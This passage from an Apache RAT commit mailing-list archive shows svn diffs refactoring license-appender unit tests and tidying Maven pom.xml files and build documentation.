writer.write("cool = true\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, null)); } public void testAddLicenceToScala() throws IOException { String filename = "tmp.scala"; - String firstLine = "package foo {"; - String newFirstLine = "/*"; - - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + final String firstLine = "package foo {"; + final String newFirstLine = "/*"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write(firstLine + "\n"); writer.write("\n"); writer.write(" object X { val x = 1; }\n"); writer.write("}\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - BufferedReader reader = new BufferedReader(new FileReader(newFile)); + } + }, + new NewFileReader() { + public void readFile(BufferedReader reader) + throws IOException { String line = reader.readLine(); assertEquals("First line is incorrect", newFirstLine, line); while ((line = reader.readLine()) != null) { @@ -333,58 +265,37 @@ public class TestLicenceAppender extends } } assertEquals("Package line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }); } public void testAddLicenseToRubyWithoutHashBang() throws IOException { String filename = "tmp.rb"; String firstLine = "#"; - - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("class Foo\n"); writer.write("end\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, null)); } public void testAddLicenseToRubyWithHashBang() throws IOException { String filename = "tmp.rb"; - String firstLine = "#!/usr/bin/env ruby"; + final String firstLine = "#!/usr/bin/env ruby"; String secondLine = "#"; - - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write(firstLine + "\n"); writer.write("class Foo\n"); writer.write("end\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - line = reader.readLine(); - assertEquals("Second line is incorrect", secondLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, secondLine)); } } From [email protected] Sat Mar 19 10:51:49 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31020 invoked from network); 19 Mar 2011 10:51:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 10:51:48 -0000 Received: (qmail 53362 invoked by uid 500); 19 Mar 2011 10:51:48 -0000 Delivered-To: [email protected] Received: (qmail 53332 invoked by uid 500); 19 Mar 2011 10:51:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53325 invoked by uid 99); 19 Mar 2011 10:51:48 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:51:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:51:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D3A7723888EA; Sat, 19 Mar 2011 10:51:21 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083157 - in /incubator/rat/main/trunk: apache-rat-core/pom.xml apache-rat-plugin/pom.xml apache-rat-tasks/pom.xml apache-rat/pom.xml pom.xml Date: Sat, 19 Mar 2011 10:51:21 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 10:51:21 2011 New Revision: 1083157 URL: http://svn.apache.org/viewvc?rev=1083157&view=rev Log: Use correct schema location for POM files. Modified: incubator/rat/main/trunk/apache-rat-core/pom.xml incubator/rat/main/trunk/apache-rat-plugin/pom.xml incubator/rat/main/trunk/apache-rat-tasks/pom.xml incubator/rat/main/trunk/apache-rat/pom.xml incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/apache-rat-core/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/pom.xml?rev=1083157&r1=1083156&r2=1083157&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-core/pom.xml Sat Mar 19 10:51:21 2011 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> +<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.apache.rat</groupId> Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/pom.xml?rev=1083157&r1=1083156&r2=1083157&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/pom.xml Sat Mar 19 10:51:21 2011 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> +<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <parent> <artifactId>apache-rat-project</artifactId> <groupId>org.apache.rat</groupId> Modified: incubator/rat/main/trunk/apache-rat-tasks/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-tasks/pom.xml?rev=1083157&r1=1083156&r2=1083157&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-tasks/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-tasks/pom.xml Sat Mar 19 10:51:21 2011 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> +<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.apache.rat</groupId> Modified: incubator/rat/main/trunk/apache-rat/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat/pom.xml?rev=1083157&r1=1083156&r2=1083157&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat/pom.xml Sat Mar 19 10:51:21 2011 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> +<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.apache.rat</groupId> Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1083157&r1=1083156&r2=1083157&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Sat Mar 19 10:51:21 2011 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> +<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.apache</groupId> From [email protected] Sat Mar 19 10:56:50 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32031 invoked from network); 19 Mar 2011 10:56:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 10:56:50 -0000 Received: (qmail 55861 invoked by uid 500); 19 Mar 2011 10:56:50 -0000 Delivered-To: [email protected] Received: (qmail 55837 invoked by uid 500); 19 Mar 2011 10:56:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55829 invoked by uid 99); 19 Mar 2011 10:56:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:56:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:56:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 529AB23888EA; Sat, 19 Mar 2011 10:56:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083158 - /incubator/rat/main/trunk/apache-rat-plugin/pom.xml Date: Sat, 19 Mar 2011 10:56:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 10:56:26 2011 New Revision: 1083158 URL: http://svn.apache.org/viewvc?rev=1083158&view=rev Log: Use ${project.version} instead of the deprecated ${pom.version}. Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/pom.xml?rev=1083158&r1=1083157&r2=1083158&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/pom.xml Sat Mar 19 10:56:26 2011 @@ -32,7 +32,7 @@ </prerequisites> <properties> - <currentVersion>${pom.version}</currentVersion> + <currentVersion>${project.version}</currentVersion> </properties> <build> From [email protected] Sat Mar 19 10:57:41 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32128 invoked from network); 19 Mar 2011 10:57:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 10:57:41 -0000 Received: (qmail 55943 invoked by uid 500); 19 Mar 2011 10:57:41 -0000 Delivered-To: [email protected] Received: (qmail 55916 invoked by uid 500); 19 Mar 2011 10:57:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55909 invoked by uid 99); 19 Mar 2011 10:57:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:57:41 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:57:40 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 49D8923888EA; Sat, 19 Mar 2011 10:57:18 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083159 - /incubator/rat/main/trunk/apache-rat/pom.xml Date: Sat, 19 Mar 2011 10:57:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 10:57:17 2011 New Revision: 1083159 URL: http://svn.apache.org/viewvc?rev=1083159&view=rev Log: Fix typo. Modified: incubator/rat/main/trunk/apache-rat/pom.xml Modified: incubator/rat/main/trunk/apache-rat/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat/pom.xml?rev=1083159&r1=1083158&r2=1083159&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat/pom.xml Sat Mar 19 10:57:17 2011 @@ -28,8 +28,8 @@ <description> This library provides upwards compatibility for projects, which are based on RAT versions upto 0.5: Basically, it - provides a jar file, which is the combination of - rat-core, rat-anttasks, and its dependencies. + provides a JAR file, which is the combination of + rat-core, rat-tasks, and its dependencies. </description> <dependencies> From [email protected] Sat Mar 19 10:59:32 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32396 invoked from network); 19 Mar 2011 10:59:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 10:59:32 -0000 Received: (qmail 57096 invoked by uid 500); 19 Mar 2011 10:59:32 -0000 Delivered-To: [email protected] Received: (qmail 57073 invoked by uid 500); 19 Mar 2011 10:59:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57066 invoked by uid 99); 19 Mar 2011 10:59:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:59:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 10:59:31 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 11C5C23888EA; Sat, 19 Mar 2011 10:59:09 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083160 - /incubator/rat/main/trunk/pom.xml Date: Sat, 19 Mar 2011 10:59:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 10:59:08 2011 New Revision: 1083160 URL: http://svn.apache.org/viewvc?rev=1083160&view=rev Log: Add missing closing element in profile example. Modified: incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1083160&r1=1083159&r2=1083160&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Sat Mar 19 10:59:08 2011 @@ -58,10 +58,11 @@ Note that binary compatibility is not ga <activation> <activeByDefault>true</activeByDefault> </activation> - <properties> - <rat.site.url>file:///C:/temp/my.rat.site</rat.site.url> - ... - </properties> + <properties> + <rat.site.url>file:///C:/temp/my.rat.site</rat.site.url> + ... + </properties> + </profile> </profiles> --> <rat.site.url>scp://people.apache.org/www/incubator.apache.org/rat/</rat.site.url> From [email protected] Sat Mar 19 11:01:55 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46890 invoked from network); 19 Mar 2011 11:01:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 11:01:55 -0000 Received: (qmail 57375 invoked by uid 500); 19 Mar 2011 11:01:55 -0000 Delivered-To: [email protected] Received: (qmail 57353 invoked by uid 500); 19 Mar 2011 11:01:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57346 invoked by uid 99); 19 Mar 2011 11:01:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:01:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:01:52 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0B68823888EA; Sat, 19 Mar 2011 11:01:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083161 - in /incubator/rat/main/trunk: apache-rat-plugin/pom.xml apache-rat-tasks/pom.xml apache-rat/pom.xml pom.xml Date: Sat, 19 Mar 2011 11:01:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 11:01:28 2011 New Revision: 1083161 URL: http://svn.apache.org/viewvc?rev=1083161&view=rev Log: Replace tabs with spaces. Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml incubator/rat/main/trunk/apache-rat-tasks/pom.xml incubator/rat/main/trunk/apache-rat/pom.xml incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/pom.xml?rev=1083161&r1=1083160&r2=1083161&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/pom.xml Sat Mar 19 11:01:28 2011 @@ -118,7 +118,7 @@ <artifactId>maven-plugin-plugin</artifactId> </plugin> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-changes-plugin</artifactId> <version>2.0-beta-2</version> <reportSets> Modified: incubator/rat/main/trunk/apache-rat-tasks/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-tasks/pom.xml?rev=1083161&r1=1083160&r2=1083161&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-tasks/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-tasks/pom.xml Sat Mar 19 11:01:28 2011 @@ -41,12 +41,12 @@ <artifactId>ant-antunit</artifactId> </dependency> <dependency> - <groupId>junit</groupId> - <artifactId>junit</artifactId> + <groupId>junit</groupId> + <artifactId>junit</artifactId> </dependency> <dependency> - <groupId>org.apache.ant</groupId> - <artifactId>ant-testutil</artifactId> + <groupId>org.apache.ant</groupId> + <artifactId>ant-testutil</artifactId> </dependency> </dependencies> @@ -71,7 +71,7 @@ </resources> <plugins> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <executions> <execution> @@ -88,7 +88,7 @@ </executions> </plugin> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-antrun-plugin</artifactId> <executions> <execution> @@ -103,14 +103,14 @@ <property name="base.dir" location="${basedir}" /> <property name="antunit.jar.name" location="${project.build.directory}/dependencies/ant-antunit.jar" /> <property name="test.skipped" value="${maven.test.skip}" /> - <property name="test.classpath" refid="maven.test.classpath" /> + <property name="test.classpath" refid="maven.test.classpath" /> </ant> - <ant antfile="src/test/resources/antunit/report-normal-operation.xml" inheritAll="false" inheritRefs="false"> + <ant antfile="src/test/resources/antunit/report-normal-operation.xml" inheritAll="false" inheritRefs="false"> <property name="jar.name" location="${project.build.outputDirectory}" /> <property name="base.dir" location="${basedir}" /> <property name="antunit.jar.name" location="${project.build.directory}/dependencies/ant-antunit.jar" /> <property name="test.skipped" value="${maven.test.skip}" /> - <property name="test.classpath" refid="maven.test.classpath" /> + <property name="test.classpath" refid="maven.test.classpath" /> </ant> </tasks> </configuration> Modified: incubator/rat/main/trunk/apache-rat/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat/pom.xml?rev=1083161&r1=1083160&r2=1083161&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat/pom.xml Sat Mar 19 11:01:28 2011 @@ -61,14 +61,14 @@ </resources> <plugins> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-source-plugin</artifactId> <configuration> <attach>false</attach> </configuration> </plugin> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <executions> <execution> @@ -86,7 +86,7 @@ </executions> </plugin> <plugin> - <groupId>org.apache.maven.plugins</groupId> + <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-jar-plugin</artifactId> <configuration> <excludes> Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1083161&r1=1083160&r2=1083161&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Sat Mar 19 11:01:28 2011 @@ -317,16 +317,16 @@ Note that binary compatibility is not ga </site> <repository> - <id>${rat.releases.id}</id> - <name>${rat.releases.name}</name> - <url>${rat.releases.url}</url> - </repository> + <id>${rat.releases.id}</id> + <name>${rat.releases.name}</name> + <url>${rat.releases.url}</url> + </repository> - <snapshotRepository> - <id>${rat.snapshots.id}</id> - <name>${rat.snapshots.name}</name> - <url>${rat.snapshots.url}</url> - </snapshotRepository> + <snapshotRepository> + <id>${rat.snapshots.id}</id> + <name>${rat.snapshots.name}</name> + <url>${rat.snapshots.url}</url> + </snapshotRepository> </distributionManagement> <modules> From [email protected] Sat Mar 19 11:04:17 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69810 invoked from network); 19 Mar 2011 11:04:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 11:04:17 -0000 Received: (qmail 58766 invoked by uid 500); 19 Mar 2011 11:04:17 -0000 Delivered-To: [email protected] Received: (qmail 58744 invoked by uid 500); 19 Mar 2011 11:04:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58737 invoked by uid 99); 19 Mar 2011 11:04:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:04:17 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:04:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B1C8023888EA; Sat, 19 Mar 2011 11:03:53 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083162 - /incubator/rat/main/trunk/pom.xml Date: Sat, 19 Mar 2011 11:03:53 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 11:03:53 2011 New Revision: 1083162 URL: http://svn.apache.org/viewvc?rev=1083162&view=rev Log: Use the correct properties in <distributionManagement>/<site>. Modified: incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1083162&r1=1083161&r2=1083162&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Sat Mar 19 11:03:53 2011 @@ -312,8 +312,8 @@ Note that binary compatibility is not ga <distributionManagement> <site> <id>${rat.site.id}</id> - <name>Apache RAT Website</name> - <url>${rat.www}</url> + <name>${rat.site.name}</name> + <url>${rat.site.url}</url> </site> <repository> From [email protected] Sat Mar 19 11:18:13 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94657 invoked from network); 19 Mar 2011 11:18:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 11:18:13 -0000 Received: (qmail 70531 invoked by uid 500); 19 Mar 2011 11:18:13 -0000 Delivered-To: [email protected] Received: (qmail 70508 invoked by uid 500); 19 Mar 2011 11:18:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70501 invoked by uid 99); 19 Mar 2011 11:18:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:18:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:18:11 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BCD6D23888EA; Sat, 19 Mar 2011 11:17:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083164 - /incubator/rat/main/trunk/src/site/apt/index.apt Date: Sat, 19 Mar 2011 11:17:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 11:17:47 2011 New Revision: 1083164 URL: http://svn.apache.org/viewvc?rev=1083164&view=rev Log: Fix the instructions for building and running RAT. Modified: incubator/rat/main/trunk/src/site/apt/index.apt Modified: incubator/rat/main/trunk/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/index.apt?rev=1083164&r1=1083163&r2=1083164&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/src/site/apt/index.apt Sat Mar 19 11:17:47 2011 @@ -56,11 +56,11 @@ Building RAT Read BUILD.txt or (for the impatient) do +------------------------------------------+ -mvn install package +mvn install +------------------------------------------+ - This should build all modules. The application jar will be - rat-app/target/rat-app-X.Y-SNAPSHOT.jar where X and Y are the current + This should build all modules. The application JAR will be + <<<apache-rat/target/apache-rat-X.Y-SNAPSHOT.jar>>> where X and Y are the current major and minor version numbers. Running RAT @@ -70,14 +70,14 